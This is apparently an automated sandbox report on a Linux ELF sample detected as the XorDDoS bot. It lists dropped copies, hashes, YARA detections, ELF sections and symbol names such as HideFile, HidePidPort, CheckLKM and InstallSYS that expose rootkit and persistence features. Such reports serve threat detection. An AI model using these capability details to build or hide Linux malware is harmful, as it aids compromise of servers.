Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/vapcvdizxx

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244375802396347
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AI:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91J
MD5:	A5394A1EE3B201DFD0198300B6604608
SHA1:	AB0E3FB5735A9B1A45CF0C68A3F3D05867D4EFFA
SHA-256:	E390B4E6B01136450448D5D42F999F030BDA52A95D37DEFA27C652B1EDB02879
SHA-512:	F4D740CFC3D2DC88E6F0CA19D3FBAB46261F484C23AF0468532588DBD9D0776A10F4435E35D3AAEFFF2AB28B17400A7F6E656C1E31678BC00CFB18B649D20B6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vapcvdizxx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/vapcvdizxx, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vapcvdizxx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/vlteqhfomz

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244375468183062
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91r
MD5:	41FC2D5615191266DF1F6AB89F56E741
SHA1:	6EA67CF65CF25B2E6AB9E7156DDCE256E4B18223
SHA-256:	49C005496333FC76F22850E77AAE3113C8B912BF2145A97778EFC19450B0B01B
SHA-512:	12E80EEA53D68DA7D6B624D73DB7B13284CF00EBA87AFCEEC67DA176C82FF2190B410B88939DDA09E94EFFBA61518F442B4218CB3D26EAA692CB8A0E0BC32D0D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vlteqhfomz, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/vlteqhfomz, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vlteqhfomz, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wxysocrflf

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244387264145506
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AT:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91m
MD5:	4AF31D012BBCFF0A3DA05560012A0665
SHA1:	53AED6E743386EC3DE0735A7C48C214FE1C6F40C
SHA-256:	13372B38B4D3BB33CC8C2A284FFA47643504EAC73B19927F26C37326787B33C6
SHA-512:	0BDBCFBF2A960B101E288D512B3054FEA27134F2F4F9EF4D0A98D2E380C27A949C82A914B92377B3CB0E609366084FC0102F7659912A87C2CB578181E90A3731
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wxysocrflf, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wxysocrflf, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wxysocrflf, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625867
Entropy (8bit):	6.244348963770229
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91h
MD5:	FF1A3683A5AD87F88858E92FBCF1AE57
SHA1:	CE220486F7D4723406582F8496E8483BCC546BEB
SHA-256:	D2D0A9FC3491D0689529B251D666F36B739ACFBF4F7FE8190B6EBABB887B7154
SHA-512:	9039533B03C9CBD3A31D1F232080A7C6296A74E36CAD46F31678478451B521D0C19CC5CC25CF88BCCC7C4ED006C2F99470595CDD34CF3814EE4509BB80D5EEBD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.244348963770229
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	1.elf
File size:	625'867 bytes
MD5:	ff1a3683a5ad87f88858e92fbcf1ae57
SHA1:	ce220486f7d4723406582f8496e8483bcc546beb
SHA256:	d2d0a9fc3491d0689529b251d666f36b739acfbf4f7fe8190b6ebabb887b7154
SHA512:	9039533b03c9cbd3a31d1f232080a7c6296a74e36cad46f31678478451b521d0c19cc5cc25cf88bccc7c4ed006c2f99470595cdd34cf3814ee4509bb80d5eebd
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91h
TLSH:	42D47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
File Content Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	553480
Section Header Size:	40
Number of Section Headers:	28
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x697d8	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b18f0	0x698f0	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2900	0x6a900	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2adc	0x6aadc	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2b00	0x6ab00	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7ec0	0x7fec0	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7ef0	0x7fef0	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7ef4	0x7fef4	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7efc	0x7fefc	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdff0	0x85ff0	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf10c	0x8610c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf120	0x86120	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf120	0x86120	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf128	0x86128	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf134	0x86134	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf138	0x86138	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf164	0x86164	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf16c	0x8616c	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf180	0x86180	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfcc0	0x86cc0	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d63d8	0x86cc0	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86cc0	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x870e2	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x87668	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90a28	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8610b	0x8610b	6.1965	0x5	R E	0x1000		.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8610c	0x80cf10c	0x80cf10c	0xbb4	0x72e0	3.6572	0x6	RW	0x1000		.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4		.note.ABI-tag
TLS	0x8610c	0x80cf10c	0x80cf10c	0x14	0x40	2.8414	0x4	R	0x4		.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Version Info Name	Version Info File Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
			.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
			.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
			.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
			.symtab	0x80b18f0	0	SECTION	<unknown>	DEFAULT	4
			.symtab	0x80b2900	0	SECTION	<unknown>	DEFAULT	5
			.symtab	0x80b2adc	0	SECTION	<unknown>	DEFAULT	6
			.symtab	0x80b2b00	0	SECTION	<unknown>	DEFAULT	7
			.symtab	0x80c7ec0	0	SECTION	<unknown>	DEFAULT	8
			.symtab	0x80c7ef0	0	SECTION	<unknown>	DEFAULT	9
			.symtab	0x80c7ef4	0	SECTION	<unknown>	DEFAULT	10
			.symtab	0x80c7efc	0	SECTION	<unknown>	DEFAULT	11
			.symtab	0x80cdff0	0	SECTION	<unknown>	DEFAULT	12
			.symtab	0x80cf10c	0	SECTION	<unknown>	DEFAULT	13
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	14
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	15
			.symtab	0x80cf128	0	SECTION	<unknown>	DEFAULT	16
			.symtab	0x80cf134	0	SECTION	<unknown>	DEFAULT	17
			.symtab	0x80cf138	0	SECTION	<unknown>	DEFAULT	18
			.symtab	0x80cf164	0	SECTION	<unknown>	DEFAULT	19
			.symtab	0x80cf16c	0	SECTION	<unknown>	DEFAULT	20
			.symtab	0x80cf180	0	SECTION	<unknown>	DEFAULT	21
			.symtab	0x80cfcc0	0	SECTION	<unknown>	DEFAULT	22
			.symtab	0x80d63d8	0	SECTION	<unknown>	DEFAULT	23
			.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108			.symtab	0x80ad950	0	NOTYPE	<unknown>	DEFAULT	3
.L113			.symtab	0x80ad990	0	NOTYPE	<unknown>	DEFAULT	3
.L114			.symtab	0x80ad9f8	0	NOTYPE	<unknown>	DEFAULT	3
.L115			.symtab	0x80ada30	0	NOTYPE	<unknown>	DEFAULT	3
.L116			.symtab	0x80ada4e	0	NOTYPE	<unknown>	DEFAULT	3
.L117			.symtab	0x80ada6c	0	NOTYPE	<unknown>	DEFAULT	3
.L118			.symtab	0x80ada89	0	NOTYPE	<unknown>	DEFAULT	3
.L119			.symtab	0x80adabd	0	NOTYPE	<unknown>	DEFAULT	3
.L12			.symtab	0x80b130b	0	NOTYPE	<unknown>	DEFAULT	3
.L120			.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L121			.symtab	0x80adafb	0	NOTYPE	<unknown>	DEFAULT	3
.L122			.symtab	0x80ad8e3	0	NOTYPE	<unknown>	DEFAULT	3
.L123			.symtab	0x80adb2b	0	NOTYPE	<unknown>	DEFAULT	3
.L124			.symtab	0x80add7f	0	NOTYPE	<unknown>	DEFAULT	3
.L125			.symtab	0x80addb4	0	NOTYPE	<unknown>	DEFAULT	3
.L126			.symtab	0x80add02	0	NOTYPE	<unknown>	DEFAULT	3
.L127			.symtab	0x80add1f	0	NOTYPE	<unknown>	DEFAULT	3
.L128			.symtab	0x80add46	0	NOTYPE	<unknown>	DEFAULT	3
.L129			.symtab	0x80add63	0	NOTYPE	<unknown>	DEFAULT	3
.L130			.symtab	0x80adb8c	0	NOTYPE	<unknown>	DEFAULT	3
.L131			.symtab	0x80adbd3	0	NOTYPE	<unknown>	DEFAULT	3
.L132			.symtab	0x80adc00	0	NOTYPE	<unknown>	DEFAULT	3
.L133			.symtab	0x80adc37	0	NOTYPE	<unknown>	DEFAULT	3
.L134			.symtab	0x80adc50	0	NOTYPE	<unknown>	DEFAULT	3
.L135			.symtab	0x80adc7d	0	NOTYPE	<unknown>	DEFAULT	3
.L136			.symtab	0x80adcb5	0	NOTYPE	<unknown>	DEFAULT	3
.L137			.symtab	0x80adcc9	0	NOTYPE	<unknown>	DEFAULT	3
.L14			.symtab	0x80b1419	0	NOTYPE	<unknown>	DEFAULT	3
.L15			.symtab	0x80b1408	0	NOTYPE	<unknown>	DEFAULT	3
.L16			.symtab	0x80b13f8	0	NOTYPE	<unknown>	DEFAULT	3
.L17			.symtab	0x80b13e8	0	NOTYPE	<unknown>	DEFAULT	3
.L18			.symtab	0x80b138c	0	NOTYPE	<unknown>	DEFAULT	3
.L19			.symtab	0x80b137e	0	NOTYPE	<unknown>	DEFAULT	3
.L20			.symtab	0x80b1345	0	NOTYPE	<unknown>	DEFAULT	3
.L21			.symtab	0x80b1371	0	NOTYPE	<unknown>	DEFAULT	3
.L258			.symtab	0x80ae76c	0	NOTYPE	<unknown>	DEFAULT	3
.L259			.symtab	0x80ae4a0	0	NOTYPE	<unknown>	DEFAULT	3
.L260			.symtab	0x80ae5f7	0	NOTYPE	<unknown>	DEFAULT	3
.L261			.symtab	0x80ae7c0	0	NOTYPE	<unknown>	DEFAULT	3
.L262			.symtab	0x80ae5e9	0	NOTYPE	<unknown>	DEFAULT	3
.L264			.symtab	0x80ae43d	0	NOTYPE	<unknown>	DEFAULT	3
.L266			.symtab	0x80ae496	0	NOTYPE	<unknown>	DEFAULT	3
.L267			.symtab	0x80ae68f	0	NOTYPE	<unknown>	DEFAULT	3
.L268			.symtab	0x80ae6a0	0	NOTYPE	<unknown>	DEFAULT	3
.L269			.symtab	0x80ae605	0	NOTYPE	<unknown>	DEFAULT	3
.L270			.symtab	0x80ae628	0	NOTYPE	<unknown>	DEFAULT	3
.L271			.symtab	0x80ae642	0	NOTYPE	<unknown>	DEFAULT	3
.L272			.symtab	0x80ae664	0	NOTYPE	<unknown>	DEFAULT	3
.L273			.symtab	0x80ae4ab	0	NOTYPE	<unknown>	DEFAULT	3
.L274			.symtab	0x80ae4e4	0	NOTYPE	<unknown>	DEFAULT	3
.L275			.symtab	0x80ae599	0	NOTYPE	<unknown>	DEFAULT	3
.L276			.symtab	0x80ae55f	0	NOTYPE	<unknown>	DEFAULT	3
.L277			.symtab	0x80ae5da	0	NOTYPE	<unknown>	DEFAULT	3
.L278			.symtab	0x80ae835	0	NOTYPE	<unknown>	DEFAULT	3
.L279			.symtab	0x80ae7ce	0	NOTYPE	<unknown>	DEFAULT	3
.L280			.symtab	0x80ae7e0	0	NOTYPE	<unknown>	DEFAULT	3
.L281			.symtab	0x80ae6b7	0	NOTYPE	<unknown>	DEFAULT	3
.L282			.symtab	0x80ae70c	0	NOTYPE	<unknown>	DEFAULT	3
.L283			.symtab	0x80ae467	0	NOTYPE	<unknown>	DEFAULT	3
.L350			.symtab	0x80ae840	0	NOTYPE	<unknown>	DEFAULT	3
.L351			.symtab	0x80ae84a	0	NOTYPE	<unknown>	DEFAULT	3
.L352			.symtab	0x80ae859	0	NOTYPE	<unknown>	DEFAULT	3
.L353			.symtab	0x80ae863	0	NOTYPE	<unknown>	DEFAULT	3
.L354			.symtab	0x80ae872	0	NOTYPE	<unknown>	DEFAULT	3
.L355			.symtab	0x80ae87d	0	NOTYPE	<unknown>	DEFAULT	3
.L356			.symtab	0x80ae887	0	NOTYPE	<unknown>	DEFAULT	3
.L357			.symtab	0x80ae892	0	NOTYPE	<unknown>	DEFAULT	3
.L358			.symtab	0x80ae89e	0	NOTYPE	<unknown>	DEFAULT	3
.L359			.symtab	0x80ae8aa	0	NOTYPE	<unknown>	DEFAULT	3
.L360			.symtab	0x80ae8b3	0	NOTYPE	<unknown>	DEFAULT	3
.L361			.symtab	0x80ae8bd	0	NOTYPE	<unknown>	DEFAULT	3
.L362			.symtab	0x80ae8cc	0	NOTYPE	<unknown>	DEFAULT	3
.L363			.symtab	0x80ae8db	0	NOTYPE	<unknown>	DEFAULT	3
.L364			.symtab	0x80ae8ea	0	NOTYPE	<unknown>	DEFAULT	3
.L365			.symtab	0x80ae8f9	0	NOTYPE	<unknown>	DEFAULT	3
.L366			.symtab	0x80ae908	0	NOTYPE	<unknown>	DEFAULT	3
.L380			.symtab	0x80ae438	0	NOTYPE	<unknown>	DEFAULT	3
.L411			.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L412			.symtab	0x80aeae6	0	NOTYPE	<unknown>	DEFAULT	3
.L413			.symtab	0x80aeb54	0	NOTYPE	<unknown>	DEFAULT	3
.L414			.symtab	0x80aebc0	0	NOTYPE	<unknown>	DEFAULT	3
.L415			.symtab	0x80aec20	0	NOTYPE	<unknown>	DEFAULT	3
.L416			.symtab	0x80aec60	0	NOTYPE	<unknown>	DEFAULT	3
.L61			.symtab	0x80ad673	0	NOTYPE	<unknown>	DEFAULT	3
.L63			.symtab	0x80ad6ef	0	NOTYPE	<unknown>	DEFAULT	3
.L64			.symtab	0x80ad6ce	0	NOTYPE	<unknown>	DEFAULT	3
.L67			.symtab	0x80ad6de	0	NOTYPE	<unknown>	DEFAULT	3
.L68			.symtab	0x80ad6d6	0	NOTYPE	<unknown>	DEFAULT	3
.L69			.symtab	0x80ad6a2	0	NOTYPE	<unknown>	DEFAULT	3
.L70			.symtab	0x80ad6c2	0	NOTYPE	<unknown>	DEFAULT	3
.L74			.symtab	0x80afb63	0	NOTYPE	<unknown>	DEFAULT	3
.L76			.symtab	0x80afbdf	0	NOTYPE	<unknown>	DEFAULT	3
.L77			.symtab	0x80afbbe	0	NOTYPE	<unknown>	DEFAULT	3
.L80			.symtab	0x80afbce	0	NOTYPE	<unknown>	DEFAULT	3
.L81			.symtab	0x80afbc6	0	NOTYPE	<unknown>	DEFAULT	3
.L82			.symtab	0x80afb92	0	NOTYPE	<unknown>	DEFAULT	3
.L83			.symtab	0x80afbb2	0	NOTYPE	<unknown>	DEFAULT	3
AddService			.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32			.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc			.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc			.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc			.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM			.symtab	0x804a670	107	FUNC	<unknown>	DEFAULT	3
CreateDir			.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR			.symtab	0x80cf4cc	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2			.symtab	0x80cf4dc	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT			.symtab	0x80cf4ec	4	OBJECT	<unknown>	DEFAULT	21
DelService			.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid			.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo			.symtab	0x804e2ce	539	FUNC	<unknown>	DEFAULT	3
GetIndex			.symtab	0x804b418	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed			.symtab	0x804e5e1	243	FUNC	<unknown>	DEFAULT	3
GetMemStat			.symtab	0x804e1d9	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP			.symtab	0x804ef5d	375	FUNC	<unknown>	DEFAULT	3
HideFile			.symtab	0x804a74d	151	FUNC	<unknown>	DEFAULT	3
HidePidPort			.symtab	0x804a6db	114	FUNC	<unknown>	DEFAULT	3
InstallSYS			.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec			.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv			.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2			.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility			.symtab	0x80cfa0c	4	OBJECT	<unknown>	DEFAULT	21
LogFile			.symtab	0x80cfa08	4	OBJECT	<unknown>	DEFAULT	21
LogMask			.symtab	0x80cfa00	4	OBJECT	<unknown>	DEFAULT	21
LogStat			.symtab	0x80d5044	4	OBJECT	<unknown>	DEFAULT	22
LogTag			.symtab	0x80d5048	4	OBJECT	<unknown>	DEFAULT	22
LogType			.symtab	0x80cfa04	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR			.symtab	0x80d1f60	33	OBJECT	<unknown>	DEFAULT	22
MainList			.symtab	0x80d1fa0	264	OBJECT	<unknown>	DEFAULT	22
ReadWord			.symtab	0x804e150	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H			.symtab	0x80cf4a4	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T			.symtab	0x80cf4a8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H			.symtab	0x80cf498	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR			.symtab	0x80cf4ac	4	OBJECT	<unknown>	DEFAULT	21
